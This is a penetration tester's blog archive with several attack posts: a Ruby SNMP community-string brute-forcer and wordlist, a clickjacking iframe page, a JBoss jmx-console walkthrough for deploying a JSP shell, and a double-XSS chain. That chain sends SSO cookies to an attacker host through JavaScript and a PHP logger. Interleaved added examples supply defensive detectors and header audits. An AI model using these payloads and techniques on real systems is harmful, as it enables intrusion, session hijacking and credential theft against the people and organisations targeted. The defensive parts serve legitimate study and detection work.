Sunday, August 4, 2013
A simple SNMP scanner in ruby
#!/usr/bin/env ruby
require 'snmp'

unless ARGV[0]
  puts "Please supply a file containing the target hosts"
  exit
end

# one host per line; strip the newline so it does not end up in the :Host value
hosts = IO.readlines(ARGV[0]).map(&:strip).reject(&:empty?)
comm_strings = ["public","private","0","0392a0","1234","2read","4changes","ANYCOM","Admin","C0de","CISCO","CR52401","IBM","ILMI","Intermec","NoGaH$@!","OrigEquipMfr","PRIVATE","PUBLIC","Private","Public","SECRET","SECURITY","SNMP","SNMP_trap","SUN","SWITCH","SYSTEM","Secret","Security","Switch","System","TENmanUFactOryPOWER","TEST","access","adm","admin","agent","agent_steal","all","all private","all public","apc","bintec","blue","c","cable-d","canon_admin","cc","cisco","community","core","debug","default","dilbert","enable","field","field-service","freekevin","fubar","guest","hello","hp_admin","ibm","ilmi","intermec","internal","l2","l3","manager","mngt","monitor","netman","network","none","openview","pass","password","pr1v4t3","proxy","publ1c","read","read-only","read-write","readwrite","red","regional","rmon","rmon_admin","ro","root","router","rw","rwa","san-fran","sanfran","scotty","secret","security","seri","snmp","snmpd","snmptrap","solaris","sun","superuser","switch","system","tech","test","test2","tiv0li","tivoli","trap","world","write","xyzzy","yellow"]

hosts.each do |host|
  mib = ""
  comm_strings.each do |comm|
    # stop at the first community string that returns a sysDescr value
    break if mib != ""
    SNMP::Manager.open(:Host => host, :community => comm, :retries => 0, :timeout => 1) do |manager|
      begin
        mib = manager.get_value("sysDescr.0")
        puts "Detected community string: '#{comm}' with host: #{host}"
      rescue Exception => msg
        # a timeout or error means this string was not accepted; try the next one
        #puts msg
      end
    end
  end
end
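As an added example (not part of the original post) from the other side of the wire: SNMPv1/v2c sends the community string in cleartext in every packet, so a sensor on the network segment sees exactly which strings a scanner like the one above is trying. The code below decodes the outer BER structure of an SNMP message to pull out the version and community, then flags sources that cycle through many distinct communities against the same agent. The packets, IP addresses and threshold are all constructed for the example.

```ruby
require 'set'

# Encode one short-form BER TLV (lengths below 128 are all we need here).
def ber(tag, content)
  content = content.b
  raise ArgumentError, "long-form length not handled" if content.bytesize >= 128
  [tag, content.bytesize].pack('CC') + content
end

# Build an SNMPv2c GetRequest for sysDescr.0 (1.3.6.1.2.1.1.1.0), the same
# object the scanner above queries. request_id must stay below 128 here.
def build_get_request(community, request_id = 1)
  oid     = ber(0x06, [0x2b, 6, 1, 2, 1, 1, 1, 0].pack('C*'))
  varbind = ber(0x30, oid + ber(0x05, ''))             # OID + NULL value
  pdu     = ber(0xa0,                                   # GetRequest-PDU
                ber(0x02, [request_id].pack('C')) +     # request-id
                ber(0x02, "\x00") +                     # error-status
                ber(0x02, "\x00") +                     # error-index
                ber(0x30, varbind))                     # variable-bindings
  ber(0x30, ber(0x02, "\x01") + ber(0x04, community) + pdu)  # version 1 == v2c
end

# Read one TLV from a byte array; returns [tag, value_bytes, next_pos].
def ber_read(bytes, pos)
  tag, len = bytes[pos], bytes[pos + 1]
  pos += 2
  if len & 0x80 != 0                      # long-form length
    n = len & 0x7f
    len = 0
    n.times { len = (len << 8) | bytes[pos]; pos += 1 }
  end
  [tag, bytes[pos, len], pos + len]
end

# Extract [version, community] from a raw SNMP message.
def parse_community(packet)
  tag, msg, _ = ber_read(packet.bytes, 0)
  raise "not an SNMP message (outer SEQUENCE missing)" unless tag == 0x30
  vtag, vbytes, pos = ber_read(msg, 0)
  raise "version INTEGER missing" unless vtag == 0x02
  ctag, cbytes, _ = ber_read(msg, pos)
  raise "community OCTET STRING missing" unless ctag == 0x04
  [vbytes.inject(0) { |acc, b| (acc << 8) | b }, cbytes.pack('C*')]
end

# Report sources that used at least `threshold` distinct community strings.
# events: array of [source_ip, raw_packet]; returns { source_ip => count }.
def community_guessing_report(events, threshold = 3)
  seen = Hash.new { |h, k| h[k] = Set.new }
  events.each do |src, packet|
    _version, community = parse_community(packet)
    seen[src] << community
  end
  report = {}
  seen.each { |src, names| report[src] = names.size if names.size >= threshold }
  report
end

# Constructed traffic: one host walking a wordlist, one legitimate poller.
SAMPLE_EVENTS = %w[public private 0392a0 NoGaH$@! tiv0li].map { |c| ['10.0.0.5', build_get_request(c)] } +
                [['10.0.0.20', build_get_request('monitoring-ro')],
                 ['10.0.0.20', build_get_request('monitoring-ro', 2)]]

if __FILE__ == $0
  community_guessing_report(SAMPLE_EVENTS).each do |src, n|
    puts "#{src} tried #{n} distinct community strings"
  end
end
```

Only the message header is decoded; the PDU is left alone because the community string is all the detection needs. A real sensor would feed UDP/161 payloads into `parse_community` the same way.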
Monday, May 6, 2013
Pen Testing Drop Box using OpenVpn in a restricted environment
Recently I had to perform a penetration test using a VMware box located at the customer's premises in the US, accessing it remotely from Europe by means of OpenVpn and my standard pentesting laptop.
The objective of this post is to describe the OpenVpn configuration I used to connect to the box through the corporate proxy.
I am not going into the details of how to set up an OpenVpn server, as there are plenty of tutorials; mine uses PKI and TLS.
The drop box I used is a Kali Linux machine.
First and foremost, the customer did not provide me with any details on the environment and deemed that no VPN access was possible. Well, he was wrong....
The only possible access to the internet was through the corporate proxy and a proxy PAC file.
The first action was to download the PAC file and work out which proxy was the right one to use. You normally look for a directive like:
return "PROXY 1.2.3.4:8080"
Bear in mind that most proxies won't accept connections to a port or protocol other than 443 and TCP.
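An added example (not from the original post) of the PAC-file step: a PAC file can return several alternatives per rule, separated by semicolons and often ending in DIRECT, so it pays to pull all of the PROXY host:port pairs out before picking one for the http-proxy line. The PAC text, the proxy addresses and the VPN server name below are constructed.

```ruby
# Constructed PAC file, standing in for the one downloaded from the corporate proxy.
SAMPLE_PAC = <<~PAC
  function FindProxyForURL(url, host) {
    if (isPlainHostName(host) || dnsDomainIs(host, ".corp.example"))
      return "DIRECT";
    if (url.substring(0, 6) == "https:")
      return "PROXY 10.1.2.3:8080; PROXY 10.1.2.4:8080; DIRECT";
    return "PROXY 10.1.2.5:3128";
  }
PAC

# Distinct [host, port] pairs named in PROXY (or HTTP) directives, in order of
# first appearance. DIRECT entries are dropped; a missing port means 80.
def proxies_in_pac(pac_text)
  found = []
  pac_text.scan(/return\s*"([^"]*)"/).flatten.each do |directive|
    directive.split(';').each do |entry|
      m = entry.strip.match(/\A(?:PROXY|HTTP)\s+([^\s:]+)(?::(\d+))?\z/i)
      next unless m
      pair = [m[1], (m[2] || '80').to_i]
      found << pair unless found.include?(pair)
    end
  end
  found
end

# The client.conf lines that depend on the proxy: as the post notes, the proxy
# has to allow CONNECT to the VPN server on 443/TCP, so the remote is pinned there.
def openvpn_proxy_lines(vpn_server, pac_text)
  host, port = proxies_in_pac(pac_text).first
  raise "no PROXY directive found in PAC file" unless host
  ["proto tcp", "remote #{vpn_server} 443", "http-proxy #{host} #{port}"]
end

if __FILE__ == $0
  puts proxies_in_pac(SAMPLE_PAC).inspect
  puts openvpn_proxy_lines('vpn.example.net', SAMPLE_PAC)
end
```

The first candidate is the one a browser would try first for HTTPS, which is also the one most likely to allow CONNECT to 443; if it refuses, the remaining pairs are the next things to try.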
So here is the OpenVpn client configuration.
client.conf
client
dev tun
proto tcp
remote <OpenVpn Server public address> 443
http-proxy <hostname/IP address of Proxy found in proxy pac file> <Proxy Port(ex. 8080)>
http-proxy-option AGENT Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-GB;+rv:1.7.6)+Gecko/20050226+Firefox/1.0.1
resolv-retry infinite
nobind
user nobody
group nogroup
persist-key
persist-tun
mute-replay-warnings
ca ca.crt
cert client.crt
key client.key
ns-cert-type server
tls-auth tlsauth.key 1
cipher BF-CBC
comp-lzo
verb 3
mute 20
And here is the server's configuration.
server.conf
local <OpenVpn Server public address>
port 443
proto tcp
dev tun
ca 2.0/keys/ca.crt
cert 2.0/keys/server.crt
key 2.0/keys/server.key # This file should be kept secret
dh 2.0/keys/dh1024.pem
tls-auth 2.0/keys/tlsauth.key 0
server 10.66.77.0 255.255.255.0
ifconfig-pool-persist ipp.txt
client-config-dir /etc/openvpn/ccd #we will assign the dropbox a static IP address see below
keepalive 10 120
cipher BF-CBC # Blowfish (default)
comp-lzo
max-clients 3
client-to-client #Very important setting so you can ssh to the dropbox from your pentesting laptop which will be connected to the same OpenVpn server
user nobody
group nogroup
persist-key
persist-tun
status openvpn-status.log
verb 3
mute 20
Finally, to assign the drop box a static IP, create a file called client in /etc/openvpn/ccd (it must have the same name used for the certificate's public and private keys, e.g. john for john.crt and john.key):
$ cat client
ifconfig-push 10.66.77.9 10.66.77.10
Connect both clients (your pentesting box and the remote VMware) to the OpenVpn server using:
openvpn --config /etc/openvpn/client.conf --verb 4
If all goes well you should be able to ping each other's clients.
The final step is to move all your files to /etc/openvpn/ and, to make OpenVpn start at boot on your drop box, issue:
sudo update-rc.d openvpn enable
Monday, April 8, 2013
Framable Web Page
Just a quick post to show the code that can be used to frame a page inside your domain.
<html>
<head></head>
<body>
<style>
iframe {
  filter: alpha(opacity=0.2); opacity: 0.2;
  position: absolute; top: 0px; left: 0px;
  height: 500px; width: 600px;
}
img {
  position: absolute; top: 0px; left: 0px;
  height: 640px; width: 640px;
}
</style>
<img src="bushido.jpg">
<iframe src="https://victim.com"></iframe>
</body>
</html>
You just need to adjust the opacity to make the victim's domain more or less visible.
Wednesday, March 14, 2012
Exporting MSF database content into CSV format
Hello everyone.
So you have imported nmap scans into Metasploit and created a workspace for every VLAN in scope, and suddenly the client asks you to give him all the nmap scans in CSV format.
If that is the case, then this post is for you.
I assume that you have installed PostgreSQL on your system and correctly configured it for use by Metasploit. I also assume the name of the database used by Metasploit is msf_database; this value can be found in the database.yml file in your framework-x.x.x/config directory.
So let's start then.
The following commands are all you need to export addresses, ports and services from the workspace whose id equals 2.
sudo su
su postgres
psql -d msf_database -f /tmp/msf_in.txt -o /tmp/msf_out.txt
cat /tmp/msf_out.txt | tr "|" ";" | cut -d ";" -f "2-4" > myfile.csv
Where the content of msf_in.txt is:
select workspaces.name, hosts.address, services.port, services.name from (services join hosts on services.host_id=hosts.id) join workspaces on hosts.workspace_id=workspaces.id where workspaces.id=2;
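An added example, not from the original post: the tr/cut pipeline above leaves psql's header row, the dashed divider and the "(n rows)" footer in the CSV, and would split any value containing the separator. This Ruby version reads the same aligned psql output, keeps the same three columns (address, port, service), drops the decoration and lets the csv library handle quoting. The psql output below is constructed to look like what the -o file would contain.

```ruby
require 'csv'

# Constructed psql aligned output for the query in msf_in.txt (workspace id 2).
SAMPLE_PSQL = <<~PSQL
     name   |   address   | port |     name
  ---------+-------------+------+---------------
   vlan10  | 10.10.1.5   |   22 | ssh
   vlan10  | 10.10.1.5   |  443 | https
   vlan10  | 10.10.1.7   | 3389 | ms-wbt-server
  (3 rows)
PSQL

# Turn psql's aligned output into rows of stripped column values, without the
# header line, the divider line and the row-count footer.
def psql_rows(psql_text)
  rows = []
  psql_text.each_line do |line|
    line = line.chomp
    next if line.strip.empty?
    next if line =~ /\A[-+]+\z/          # "-----+-----" divider
    next if line =~ /\A\(\d+ rows?\)\z/  # "(3 rows)" footer
    rows << line.split('|').map(&:strip)
  end
  rows.shift                             # column header row
  rows
end

# Emit CSV with the same fields the post's `cut -d ";" -f 2-4` keeps:
# address, port, service (0-based columns 1..3 of the query's four).
def export_csv(psql_text, fields = 1..3, col_sep = ';')
  CSV.generate(col_sep: col_sep) do |csv|
    csv << %w[address port service]
    psql_rows(psql_text).each { |row| csv << row[fields] }
  end
end

if __FILE__ == $0
  print export_csv(ARGV[0] ? File.read(ARGV[0]) : SAMPLE_PSQL)
end
```

Run it as `ruby export_msf.rb /tmp/msf_out.txt > myfile.csv` to process the real file; with no argument it prints the constructed sample.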
Friday, June 25, 2010
The curious case of JBoss Hacking
Hi everyone.
Today I'd like to talk about hacking JBoss.
There are lots of resources on the net about it, but hopefully reading this article will help you when you hit a dead end because the configuration is not so standard.
The prerequisite is that you have access to the jmx-console as admin.
It is not so rare to see JBoss installations where the jmx-console is not password protected.
Well, now what...
You would like to shovel your nice shell by using the addURL() function of the DeploymentScanner, but suddenly you think wtf.... the victim machine cannot connect to my web server on any port (no reverse connections, only bind allowed).
There is a workaround, as described in this very detailed and nice paper:
http://www.redteam-pentesting.de/publications/jboss (read it before going further on)
The technique described there uses another JBoss class called DeploymentFileRepository,
at:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository
and its very useful store() function.
But sometimes things go wrong anyway: after posting your jsp code, you realise it doesn't get deployed by JBoss.
This is because the path where your directory (say shell.war) resides is not in the DeploymentScanner's URL list, so the hot deployment fails.
The solution is to find out where your directory is by inducing an error in the server:
Function description:
void store()
MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
p2 java.lang.String (no description)
p3 java.lang.String (no description)
p4 java.lang.String (no description)
p5 boolean True False (no description)
Expected values:
p1 = shell.war (your dir name)
p2 = shell (name of the jsp file containing the code)
p3 = .jsp (extension)
p4 = (jsp code)
p5 = true
Error inducing values:
p1 = ../shell.war
p2 = shell
p3 = .jsp
p4 =
p5 = true
Next, check the following line in the error:
java.lang.IllegalArgumentException: child '../helpme.war' should be a child of parent '/prd/jboss/bws/web/bws106/./deploy/management'
org.jboss.console.manager.DeploymentFileRepository.getFile(DeploymentFileRepository.java:151)
The path '/prd/jboss/bws/web/bws106/deploy/management' is where your shell.war is residing.
Now that we know it, we only have to use the addURL() function of the DeploymentScanner class.
So head to:
http://host:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL
Function description:
void addURL()
MBean Operation.
Param ParamType ParamValue ParamDescription
p1 java.lang.String (no description)
The URL to enter in the addURL() form is:
file:/prd/jboss/bws/web/bws106/deploy/management/
Note the trailing slash.
Now call your shell by loading the following url:
http://host:8080/shell/shell.jsp
Bye for now...
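An added example, not from the original post, for whoever has to defend a JBoss box rather than attack it: every step of the walkthrough above goes through /jmx-console/HtmlAdaptor, and the two MBeans it touches (DeploymentFileRepository and DeploymentScanner) are named in the request's query string. The code below parses common-log-format access-log lines, URL-decodes the `name` parameter and rates jmx-console requests: a 200 on a watched MBean is high, any other 200 to the console means it answered without authentication, and a 401 is just informational. The log lines, addresses and timestamps are constructed.

```ruby
require 'uri'
require 'cgi'

# Common log format: source, identd, user, [timestamp], "request line", status, bytes.
LOG_RE = /\A(?<src>\S+) \S+ \S+ \[[^\]]+\] "(?<method>[A-Z]+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# The MBeans used in the deployment walkthrough above.
WATCHED_MBEANS = [
  'jboss.admin:service=DeploymentFileRepository',
  'jboss.deployment:type=DeploymentScanner,flavor=URL'
]

# Constructed access-log excerpt: one host walking the jmx-console, two others browsing.
SAMPLE_ACCESS_LOG = [
  '10.9.8.7 - - [25/Jun/2010:10:15:02 +0200] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.admin%3Aservice%3DDeploymentFileRepository HTTP/1.1" 200 5120',
  '10.9.8.7 - - [25/Jun/2010:10:15:40 +0200] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 844',
  '10.9.8.7 - - [25/Jun/2010:10:16:05 +0200] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL HTTP/1.1" 200 3990',
  '10.9.8.7 - - [25/Jun/2010:10:16:30 +0200] "GET /shell/shell.jsp HTTP/1.1" 200 210',
  '192.168.1.10 - - [25/Jun/2010:10:20:00 +0200] "GET /web-console/ HTTP/1.1" 401 0',
  '192.168.1.11 - - [25/Jun/2010:10:21:00 +0200] "GET /index.html HTTP/1.1" 200 1200'
]

# Parse one line into a record, or nil if it is not a well-formed access-log line.
def parse_access_line(line)
  m = LOG_RE.match(line)
  return nil unless m
  uri = begin
    URI.parse(m[:target])
  rescue URI::InvalidURIError
    return nil
  end
  params = uri.query ? CGI.parse(uri.query) : {}
  { src: m[:src], method: m[:method], path: uri.path, status: m[:status].to_i,
    action: (params['action'] || []).first, mbean: (params['name'] || []).first }
end

# Every jmx-console request, with a severity attached.
def jmx_console_findings(lines)
  records = lines.map { |l| parse_access_line(l) }.compact
  records.select { |r| r[:path].start_with?('/jmx-console/') }.map do |r|
    severity =
      if r[:status] == 200 && WATCHED_MBEANS.include?(r[:mbean]) then 'high'
      elsif r[:status] == 200 then 'medium'   # console reachable without auth
      else 'info'
      end
    r.merge(severity: severity)
  end
end

if __FILE__ == $0
  jmx_console_findings(SAMPLE_ACCESS_LOG).each do |f|
    puts "#{f[:severity]}: #{f[:src]} #{f[:method]} #{f[:path]} #{f[:mbean]} -> #{f[:status]}"
  end
end
```

The fix the findings point at is the same in every case: put the jmx-console behind authentication (or remove it) and restrict it to an admin network, so the deployment MBeans are never reachable from a client-facing interface.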
Tuesday, February 9, 2010
Ruby SOAP client with basic authentication and client certificate
During these days I needed to pentest a web service, but since wsfuzzer wasn't working correctly I had to write my own Ruby SOAP client, able to connect to an SSL-protected web service with a client certificate and basic authentication.
After many hours spent looking for a suitable library, I decided to use savon with Ruby 1.8.7 (DON'T USE RUBY 1.9.1, it won't work).
First I had to convert one p12 certificate into two PEM files:
openssl pkcs12 -in global.p12 -out global.pem
Then we cut the private key part out of global.pem, copy it into protected_key.pem, and issue the following commands (you have to provide the password of your private key):
mv global.pem cert.pem
openssl rsa -in protected_key.pem -out key.pem
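The same p12-to-PEM split done in Ruby, as an added example rather than the post's own steps: it opens the PKCS#12 bundle, checks that the private key really belongs to the certificate before anything is written, and writes key.pem with owner-only permissions since, like the output of `openssl rsa` above, it is unencrypted. Because a real global.p12 cannot be shipped with the example, a throwaway self-signed client certificate is generated and packed into a PKCS#12 in `make_sample_p12`; the subject name and password are constructed.

```ruby
require 'openssl'

# Split a PKCS#12 bundle into [cert_pem, key_pem], refusing mismatched pairs.
def split_pkcs12(p12_der, password)
  p12 = OpenSSL::PKCS12.new(p12_der, password)
  cert, key = p12.certificate, p12.key
  raise "private key does not match certificate" unless cert.check_private_key(key)
  [cert.to_pem, key.to_pem]
end

# Write the two PEM files the savon client below expects (cert.pem, key.pem).
def write_pems(p12_der, password, cert_path = 'cert.pem', key_path = 'key.pem')
  cert_pem, key_pem = split_pkcs12(p12_der, password)
  File.open(cert_path, 'w') { |f| f.write(cert_pem) }
  File.open(key_path, 'w', 0o600) { |f| f.write(key_pem) }  # unencrypted key: owner-only
  [cert_path, key_path]
end

# Constructed stand-in for global.p12: a self-signed client certificate and its
# key, bundled under the given password.
def make_sample_p12(password)
  key  = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2
  cert.serial     = 1
  cert.subject    = OpenSSL::X509::Name.parse('/CN=pentest-client/O=Example')
  cert.issuer     = cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now
  cert.not_after  = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  # explicit AES-based PBE so the bundle also opens on OpenSSL 3 without the legacy provider
  OpenSSL::PKCS12.create(password, 'client', key, cert, nil, 'AES-256-CBC', 'AES-256-CBC').to_der
end

if __FILE__ == $0
  pass = 'constructed-example-password'
  cert_pem, key_pem = split_pkcs12(make_sample_p12(pass), pass)
  puts cert_pem.lines.first, key_pem.lines.first
end
```

With a real bundle the call is `write_pems(File.binread('global.p12'), password)`; a wrong password raises OpenSSL::PKCS12::PKCS12Error at the MAC check instead of producing garbage files.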
Then we can finally write the Ruby code:
require 'rubygems'
require 'openssl'
require 'savon'

client = Savon::Client.new "https://example.com/services?wsdl"

# client certificate authentication, using the cert.pem and key.pem produced above
client.request.http.ssl_client_auth(
  :cert => OpenSSL::X509::Certificate.new(File.read("cert.pem")),
  :key => OpenSSL::PKey::RSA.new(File.read("key.pem")),
  :verify_mode => OpenSSL::SSL::VERIFY_NONE
)

# BASIC AUTHENTICATION
client.request.basic_auth "User", "Password"

puts client.wsdl.soap_actions
#puts client.wsdl.namespace_uri

# don't forget @inorder, otherwise the client will send the key values in a sequence
# different from the one you wrote down
response = client.add_customer do |soap|
  soap.body = {
    :id => 111,
    :tel => 1233,
    :issuer => "asder",
    :payment_mode => 1,
    :alias => "asd",
    :@inorder => [:id, :tel, :issuer, :payment_mode, :alias]
  }
end
puts response.to_xml
Finally, you have to add some permutations to your values to make it a real SOAP fuzzer.
You can start with the file all_attacks.txt from WSFuzzer.
Monday, January 25, 2010
How to steal cross domain cookies via double XSS
During a pentest of a big company using an SSO (single sign-on) system I found a stored XSS
in one of their sites, call it "a.com". Unfortunately this site doesn't participate in the SSO login system,
so I had to devise a way to use it to steal the cookies from one of the SSO domains.
After some tests I found that "b.com" (one of the SSO domains) was vulnerable to reflected XSS, so by injecting into a.com an iframe
whose source called the vulnerable "b.com" URL, which in turn loaded an image whose source called
my server, I managed to steal SSO-authenticated cookies.
Let's see some code:
(the code takes advantage of jquery.js, since it was already loaded by a.com)
The following code is an external js file injected through the stored XSS vulnerable parameter in "a.com":
$(document).ready(function() {
  var el = document.createElement("iframe");
  el.setAttribute('id', 'ifrm');
  el.setAttribute('height', '0');
  el.setAttribute('width', '0');
  el.style.visibility = "hidden";
  document.body.appendChild(el);
  var url = "http://www.b.com/index.php?query=%22%3CSCRIPT/SRC=http://myevilsite.com/Cookie_Stealer/ex.js?";
  el.setAttribute('src', url);
});
where ex.js is:
var img = document.createElement("img");
img.setAttribute("width", "30");
img.src = "http://myevilsite.com/Cookie_Stealer/stealer.php?c=" + encodeURI(document.cookie) + "&location=" + document.location;
and stealer.php code is:
<?php
$cookie = $_GET["c"];
echo $cookie;
$file = fopen("cookielog.txt", "a") or die("Cannot open it");
fwrite($file, $cookie . "\n\n");
?>
Finally, visiting a.com while logged in to any of the SSO domains causes your credentials to be sent to my server.
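An added example, not part of either post, that covers the two response-header weaknesses relied on above: the "Framable Web Page" post only works when victim.com sends no framing restriction, and the cookie-stealing chain here only pays off because b.com's SSO cookie is readable from document.cookie, which HttpOnly would have denied (the reflected XSS itself still needs fixing). The audit below takes a hash of response headers and reports both conditions; the hostnames, cookie names and header values are constructed.

```ruby
# Constructed response headers for three hosts.
SAMPLE_RESPONSES = {
  'victim.com' => {
    'Content-Type' => 'text/html',
    'Set-Cookie'   => ['session=abc123; Path=/']
  },
  'b.com' => {
    'Content-Type'    => 'text/html',
    'Set-Cookie'      => ['SSOID=xyz; Path=/; Domain=.b.com; Secure'],
    'X-Frame-Options' => 'SAMEORIGIN'
  },
  'hardened.example' => {
    'Content-Type'            => 'text/html',
    'Set-Cookie'              => ['SSOID=xyz; Path=/; Secure; HttpOnly; SameSite=Lax'],
    'Content-Security-Policy' => "default-src 'self'; frame-ancestors 'none'"
  }
}

# Can a third-party page embed this response in an iframe?
def frameable?(headers)
  xfo = headers['X-Frame-Options'].to_s.strip.upcase
  return false if %w[DENY SAMEORIGIN].include?(xfo)
  fa = headers['Content-Security-Policy'].to_s[/frame-ancestors\s+([^;]+)/i, 1]
  return true if fa.nil?
  fa.split.include?('*')   # a wildcard source still lets any origin frame the page
end

# Names of cookies set without HttpOnly, i.e. exposed to document.cookie.
def script_readable_cookies(headers)
  Array(headers['Set-Cookie']).reject { |c|
    c.split(';').drop(1).map(&:strip).any? { |attr| attr.casecmp('HttpOnly') == 0 }
  }.map { |c| c.split('=', 2).first.strip }
end

# Human-readable issue list for one response.
def audit_headers(headers)
  issues = []
  issues << 'frameable: no X-Frame-Options DENY/SAMEORIGIN and no CSP frame-ancestors' if frameable?(headers)
  exposed = script_readable_cookies(headers)
  issues << "cookies readable by script (no HttpOnly): #{exposed.join(', ')}" unless exposed.empty?
  issues
end

if __FILE__ == $0
  SAMPLE_RESPONSES.each do |host, headers|
    issues = audit_headers(headers)
    puts "#{host}: #{issues.empty? ? 'ok' : issues.join('; ')}"
  end
end
```

Against a live site the same functions can be fed `Net::HTTP` response headers (`response.get_fields('Set-Cookie')` gives the array form used here).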